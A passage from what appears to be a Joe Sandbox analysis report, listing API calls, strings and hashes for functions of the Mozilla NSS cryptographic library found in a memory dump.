Instruction Fuzzy Hash: 2511ECE5E1722162DF2176B56F01AAE39AC5B0314EF184B34EC09D6F01FB16D915C2EE

Function 6C7F1C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6C7F13BC,?,?,?,6C7F1193), ref: 6C7F1C6B
PR_NewLock.NSS3(?,6C7F1193), ref: 6C7F1C7E

Part of subcall function 6C7A98D0: calloc.MOZGLUE(00000001,00000084,6C6D0936,00000001,?,6C6D102C), ref: 6C7A98E5

PR_NewCondVar.NSS3(00000000,?,6C7F1193), ref: 6C7F1C91

Part of subcall function 6C6CBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C6D21BC), ref: 6C6CBB8C

PR_NewCondVar.NSS3(00000000,?,?,6C7F1193), ref: 6C7F1CA7

Part of subcall function 6C6CBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C6CBBEB
Part of subcall function 6C6CBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C6CBBFB
Part of subcall function 6C6CBB80: GetLastError.KERNEL32 ref: 6C6CBC03
Part of subcall function 6C6CBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C6CBC19
Part of subcall function 6C6CBB80: free.MOZGLUE(00000000), ref: 6C6CBC22

PR_NewCondVar.NSS3(00000000,?,?,?,6C7F1193), ref: 6C7F1CBE
PR_NewCondVar.NSS3(00000000,?,?,?,?,6C7F1193), ref: 6C7F1CD4
calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6C7F1193), ref: 6C7F1CFE
PR_Lock.NSS3(?,?,?,?,?,?,?,6C7F1193), ref: 6C7F1D1A

Part of subcall function 6C7A9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C6D1A48), ref: 6C7A9BB3
Part of subcall function 6C7A9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C6D1A48), ref: 6C7A9BC8

PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6C7F1193), ref: 6C7F1D3D

Part of subcall function 6C78DD70: TlsGetValue.KERNEL32 ref: 6C78DD8C
Part of subcall function 6C78DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C78DDB4

PR_SetError.NSS3(FFFFE890,00000000,?,6C7F1193), ref: 6C7F1D4E
PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6C7F1193), ref: 6C7F1D64
PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6C7F1193), ref: 6C7F1D6F
PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6C7F1193), ref: 6C7F1D7B
PR_DestroyCondVar.NSS3(?,?,?,?,?,6C7F1193), ref: 6C7F1D87
PR_DestroyCondVar.NSS3(00000000,?,?,?,6C7F1193), ref: 6C7F1D93
PR_DestroyLock.NSS3(00000000,?,?,6C7F1193), ref: 6C7F1D9F
free.MOZGLUE(00000000,?,6C7F1193), ref: 6C7F1DA8

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
String ID:
API String ID: 3246495057-0
Opcode ID: e33cd5d44af202b8876cefe62bd33be035a030d0ce60a949470e63db132f165e
Instruction ID: 9d4837b19e9450ee7f81c4b75d55e0a0e2a990763465da201c097ad8da6cc1fb
Opcode Fuzzy Hash: e33cd5d44af202b8876cefe62bd33be035a030d0ce60a949470e63db132f165e
Instruction Fuzzy Hash: 86311AF1E003015FEB209F65AD45A5776F8AF1261CF044939E85A87B41FB31E419CBE6

Function 6C705E60 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 348COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C705ECF
EnterCriticalSection.KERNEL32(?), ref: 6C705EE3
PR_Unlock.NSS3(?), ref: 6C705F0A
PK11_MakeIDFromPubKey.NSS3(00000014), ref: 6C705FB5

Strings

S&rl, xrefs: 6C705E6C, 6C70627F, 6C705F12
S&rl, xrefs: 6C7062E3
NSS_USE_DECODED_CKA_EC_POINT, xrefs: 6C7061F4

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalEnterFromK11_MakeSectionUnlockValue
String ID: NSS_USE_DECODED_CKA_EC_POINT$S&rl$S&rl
API String ID: 2280678669-3812936573
Opcode ID: 16454dffdc5056e7ef604d3ebb164cb594325d46c73538d30159278d8a94f9af
Instruction ID: 938f046b4e324447bfa94377eb4a66baf17eeb27be38ebb2a3cb20eafc2c11a2
Opcode Fuzzy Hash: 16454dffdc5056e7ef604d3ebb164cb594325d46c73538d30159278d8a94f9af
Instruction Fuzzy Hash: 4EF1F4B5A002158FDB54CF18C984B86BBF4FF09308F5582AADC089B746E774EA95CF91

Function 6C750C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(*,ul), ref: 6C750C81

Part of subcall function 6C73BE30: SECOID_FindOID_Util.NSS3(6C6F311B,00000000,?,6C6F311B,?), ref: 6C73BE44

Part of subcall function 6C728500: SECOID_GetAlgorithmTag_Util.NSS3(6C7295DC,00000000,00000000,00000000,?,6C7295DC,00000000,00000000,?,6C707F4A,00000000,?,00000000,00000000), ref: 6C728517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C750CC4

Part of subcall function 6C73FAB0: free.MOZGLUE(?,-00000001,?,?,6C6DF673,00000000,00000000), ref: 6C73FAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C750CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C750D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C750D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C750D7D
free.MOZGLUE(00000000), ref: 6C750DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C750DC1
free.MOZGLUE(00000000), ref: 6C750DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C750E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C750E0F

Part of subcall function 6C7295C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C707F4A,00000000,?,00000000,00000000), ref: 6C7295E0
Part of subcall function 6C7295C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C707F4A,00000000,?,00000000,00000000), ref: 6C7295F5
Part of subcall function 6C7295C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C729609
Part of subcall function 6C7295C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C72961D
Part of subcall function 6C7295C0: PK11_GetInternalSlot.NSS3 ref: 6C72970B
Part of subcall function 6C7295C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C729756
Part of subcall function 6C7295C0: PK11_GetIVLength.NSS3(?), ref: 6C729767
Part of subcall function 6C7295C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C72977E
Part of subcall function 6C7295C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C72978E

Strings

-$ul, xrefs: 6C750C64
*,ul, xrefs: 6C750C69, 6C750DE0, 6C750C80, 6C750C8B, 6C750CAF
*,ul, xrefs: 6C750DCC

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID: *,ul$*,ul$-$ul
API String ID: 3136566230-1892452201
Opcode ID: 1273d658af974a765177008039b6569f73895e8e6e79b0da30ba8ab6d23e0f58
Instruction ID: 619a7c45d89ed7a72e0534d77bee018c58d49f65b65cfc3882d518d896eda5cb
Opcode Fuzzy Hash: 1273d658af974a765177008039b6569f73895e8e6e79b0da30ba8ab6d23e0f58
Instruction Fuzzy Hash: F141D5B1900259ABEB009F65DE4ABAF7674FF0130CF140134E91957742EB35AA28CBE2

Function 6C745CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6C745EC0,00000000,?,?), ref: 6C745CBE
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6C745CD7
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C745CF0
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C745D09
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6C745EC0,00000000,?,?), ref: 6C745D1F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6C745D3C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C745D51
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C745D66
PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6C745D80

Strings

multiaccess:, xrefs: 6C745CB8
dbm:, xrefs: 6C745D03, 6C745D60
sql:, xrefs: 6C745CD1, 6C745D36
NSS_DEFAULT_DB_TYPE, xrefs: 6C745D1A
extern:, xrefs: 6C745CEA, 6C745D4B

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: strncmp$SecureStrdup_Util
String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
API String ID: 1171493939-3017051476
Opcode ID: 3acfe83b2ef94a27f9537cf377404281964e5607fb13745662175f74457f1dac
Instruction ID: 6d744589bba87e315d4174345533061e9bbc065834e2dc968b207c4df769d745
Opcode Fuzzy Hash: 3acfe83b2ef94a27f9537cf377404281964e5607fb13745662175f74457f1dac
Instruction Fuzzy Hash: B73149B07063116BF7A11E25EECEB2A3768AF0230DF104930ED99E6B82E775D401CAD5

Function 6C746CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C811DE0,?), ref: 6C746CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C746D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C746D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C746D82
DER_GetInteger_Util.NSS3(?), ref: 6C746DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C746DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C746E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C746F19
PK11_DigestBegin.NSS3(00000000), ref: 6C746F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C746F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C747011
PK11_FreeSymKey.NSS3(00000000), ref: 6C747033
free.MOZGLUE(?), ref: 6C74703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C747060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C747087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C7470AF

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 97244bb202ca358f1bbba63abc1793692d60f623b790b29ecdfb6f041ec1cce4
Instruction ID: 126c35525905be58c2691e8e0b7f8419d9ebac803286421c42093dbd50d11dac
Opcode Fuzzy Hash: 97244bb202ca358f1bbba63abc1793692d60f623b790b29ecdfb6f041ec1cce4
Instruction Fuzzy Hash: 0EA13BB19052009BEB009F24DE49B5B32E5EB8131CF24C939E959CBB91F735DA49C793

Function 6C70AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C6EAB95,00000000,?,00000000,00000000,00000000), ref: 6C70AF25
EnterCriticalSection.KERNEL32(?,?,?,?,6C6EAB95,00000000,?,00000000,00000000,00000000), ref: 6C70AF39
PR_Unlock.NSS3(?,?,?,6C6EAB95,00000000,?,00000000,00000000,00000000), ref: 6C70AF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C6EAB95,00000000,?,00000000,00000000,00000000), ref: 6C70AF69
TlsGetValue.KERNEL32 ref: 6C70B06B
EnterCriticalSection.KERNEL32(?), ref: 6C70B083
PR_Unlock.NSS3(?), ref: 6C70B0A4
TlsGetValue.KERNEL32 ref: 6C70B0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6C70B0D9
PR_Unlock.NSS3 ref: 6C70B102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C70B151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C70B182

Part of subcall function 6C73FAB0: free.MOZGLUE(?,-00000001,?,?,6C6DF673,00000000,00000000), ref: 6C73FAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C70B177

Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C6EAB95,00000000,?,00000000,00000000,00000000), ref: 6C70B1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6C6EAB95,00000000,?,00000000,00000000,00000000), ref: 6C70B1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C6EAB95,00000000,?,00000000,00000000,00000000), ref: 6C70B1C2

Part of subcall function 6C731560: TlsGetValue.KERNEL32(00000000,?,6C700844,?), ref: 6C73157A
Part of subcall function 6C731560: EnterCriticalSection.KERNEL32(?,?,?,6C700844,?), ref: 6C73158F
Part of subcall function 6C731560: PR_Unlock.NSS3(?,?,?,?,6C700844,?), ref: 6C7315B2

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: c408c9ac11e63df866ae8b5a542e3cdec4e686b9daf6c3cf328a7cbfcd42d9df
Instruction ID: 76c6b9a9f6885fba39f42d760078fca2ae88d13d9bb0b7423072abfcdb69f310
Opcode Fuzzy Hash: c408c9ac11e63df866ae8b5a542e3cdec4e686b9daf6c3cf328a7cbfcd42d9df
Instruction Fuzzy Hash: FAA1EFB1E00206ABEF109F64DD85AEA77B5AF0530CF104135E908A7752E731EA59CBE1

Function 6C702C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(#?pl,?,6C6FE477,?,?,?,00000001,00000000,?,?,6C703F23,?), ref: 6C702C62
EnterCriticalSection.KERNEL32(0000001C,?,6C6FE477,?,?,?,00000001,00000000,?,?,6C703F23,?), ref: 6C702C76
PL_HashTableLookup.NSS3(00000000,?,?,6C6FE477,?,?,?,00000001,00000000,?,?,6C703F23,?), ref: 6C702C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C6FE477,?,?,?,00000001,00000000,?,?,6C703F23,?), ref: 6C702C93

Part of subcall function 6C78DD70: TlsGetValue.KERNEL32 ref: 6C78DD8C
Part of subcall function 6C78DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C78DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C6FE477,?,?,?,00000001,00000000,?,?,6C703F23,?), ref: 6C702CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C6FE477,?,?,?,00000001,00000000,?,?,6C703F23,?), ref: 6C702CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C6FE477,?,?,?,00000001,00000000,?,?,6C703F23), ref: 6C702CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C6FE477,?,?,?,00000001,00000000,?), ref: 6C702CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C6FE477,?,?,?,00000001,00000000,?), ref: 6C702D4D
EnterCriticalSection.KERNEL32(?), ref: 6C702D61
PL_HashTableLookup.NSS3(?,?), ref: 6C702D71
PR_Unlock.NSS3(?), ref: 6C702D7E

Part of subcall function 6C6D07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C66204A), ref: 6C6D07AD
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C66204A), ref: 6C6D07CD
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C66204A), ref: 6C6D07D6
Part of subcall function 6C6D07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C66204A), ref: 6C6D07E4
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,6C66204A), ref: 6C6D0864
Part of subcall function 6C6D07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6D0880
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,?,6C66204A), ref: 6C6D08CB
Part of subcall function 6C6D07A0: TlsGetValue.KERNEL32(?,?,6C66204A), ref: 6C6D08D7
Part of subcall function 6C6D07A0: TlsGetValue.KERNEL32(?,?,6C66204A), ref: 6C6D08FB

Strings

#?pl, xrefs: 6C702C43

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID: #?pl
API String ID: 2446853827-3620678116
Opcode ID: 5933e9697f4d9a9eda1d948ec7574cee68ea9397d361dfeebdea7e5d062880ca
Instruction ID: bf41dcf0a1fcbe348d67333ce09ebf7f2924c9af69f8b3fa12bc07b04d2b3b17
Opcode Fuzzy Hash: 5933e9697f4d9a9eda1d948ec7574cee68ea9397d361dfeebdea7e5d062880ca
Instruction Fuzzy Hash: 885109B6E00205ABDB109F24DC4989A77B8FF1635CB048535ED1897B12E731ED64CBE5

Function 6C75AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C75ADB1

Part of subcall function 6C73BE30: SECOID_FindOID_Util.NSS3(6C6F311B,00000000,?,6C6F311B,?), ref: 6C73BE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C75ADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C75AE08

Part of subcall function 6C73B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8118D0,?), ref: 6C73B095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C75AE25
PL_FreeArenaPool.NSS3 ref: 6C75AE63
PR_CallOnce.NSS3(6C842AA4,6C7412D0), ref: 6C75AE4D

Part of subcall function 6C664C70: TlsGetValue.KERNEL32(?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664C97
Part of subcall function 6C664C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664CB0
Part of subcall function 6C664C70: PR_Unlock.NSS3(?,?,?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C75AE93
PR_CallOnce.NSS3(6C842AA4,6C7412D0), ref: 6C75AECC
PL_FreeArenaPool.NSS3 ref: 6C75AEDE
PL_FinishArenaPool.NSS3 ref: 6C75AEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C75AEF5
PL_FinishArenaPool.NSS3 ref: 6C75AF16

Strings

security, xrefs: 6C75ADEE

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: 2441f98cc64bc953197c810a02247f963707dc8bb52cf35c16f0a7a3559c9b2a
Instruction ID: e9c1f4318dc9924045a71e8fc7ebb3e094806c10aeb07a2d41e06ffeeaea797b
Opcode Fuzzy Hash: 2441f98cc64bc953197c810a02247f963707dc8bb52cf35c16f0a7a3559c9b2a
Instruction Fuzzy Hash: F6412CB1A0431467E7209B189E4A7BA32AC9F5272CF904535D914D2F81FF35DA28C6F7

Function 6C7FAF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7A9890: TlsGetValue.KERNEL32(?,?,?,6C7A97EB), ref: 6C7A989E

EnterCriticalSection.KERNEL32(?), ref: 6C7FAF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C7FAFCE
PR_SetPollableEvent.NSS3(?), ref: 6C7FAFD9
EnterCriticalSection.KERNEL32(?), ref: 6C7FAFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6C7FB00F
_PR_MD_UNLOCK.NSS3(?), ref: 6C7FB02F
_PR_MD_UNLOCK.NSS3(?), ref: 6C7FB070
PR_JoinThread.NSS3(?), ref: 6C7FB07B
free.MOZGLUE(?), ref: 6C7FB084
EnterCriticalSection.KERNEL32(?), ref: 6C7FB09B
_PR_MD_UNLOCK.NSS3(?), ref: 6C7FB0C4
PR_JoinThread.NSS3(?), ref: 6C7FB0F3
free.MOZGLUE(?), ref: 6C7FB0FC
PR_JoinThread.NSS3(?), ref: 6C7FB137
free.MOZGLUE(?), ref: 6C7FB140

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: 14d1d6880d6c553831a9b8bc71b66888d832ba6ba39380a167e31d0de4f7a45f
Instruction ID: 5feedd980e96271e1d7c5976cee7671131926712aaa14f0e59b1ca1b4f6d5d7b
Opcode Fuzzy Hash: 14d1d6880d6c553831a9b8bc71b66888d832ba6ba39380a167e31d0de4f7a45f
Instruction Fuzzy Hash: 2E919EB6900601DFCB14DF15C9C4846BBF1FF4935872986A9D8295BB26E732FC56CB80

Function 6C775CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 6C772BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C772A28,00000060,00000001), ref: 6C772BF0
